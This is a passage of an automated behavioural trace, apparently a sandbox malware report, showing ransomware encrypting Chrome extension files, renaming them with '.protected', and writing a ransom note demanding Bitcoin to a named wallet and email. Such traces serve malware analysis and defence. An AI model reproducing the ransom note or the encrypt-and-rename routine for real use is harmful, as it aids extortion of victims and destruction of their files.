lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.027] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\..") returned 144 [0080.027] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.027] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.027] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.028] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.028] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.028] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.028] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.028] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.028] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.028] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0080.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.029] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0080.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.029] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.030] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.030] CloseHandle (hObject=0x168) returned 1 [0080.030] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.protected") returned 165 [0080.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.protected")) returned 1 [0080.030] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.030] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.030] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0080.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.030] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.031] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.031] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.031] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.031] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.031] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.032] CloseHandle (hObject=0x164) returned 1 [0080.032] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0080.032] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB") returned 144 [0080.032] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0080.032] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0080.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*") returned 146 [0080.032] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.032] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.032] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.032] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.032] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.032] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\.") returned 146 [0080.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.032] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.032] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.032] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.032] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.032] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.032] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\..") returned 147 [0080.032] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.032] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0080.033] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.033] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0080.033] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0080.033] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0080.033] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.033] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.034] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.034] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.034] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.034] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.034] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.034] CloseHandle (hObject=0x168) returned 1 [0080.035] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0080.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0080.035] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.035] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.035] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0080.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.035] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.035] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.036] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.036] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.036] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.036] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.036] CloseHandle (hObject=0x164) returned 1 [0080.036] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0080.036] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US") returned 144 [0080.037] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0080.037] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*") returned 146 [0080.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.037] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.037] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.037] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.037] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\.") returned 146 [0080.037] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.037] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.037] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.037] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.037] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.037] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\..") returned 147 [0080.037] lstrcmpW (lpString1="..", 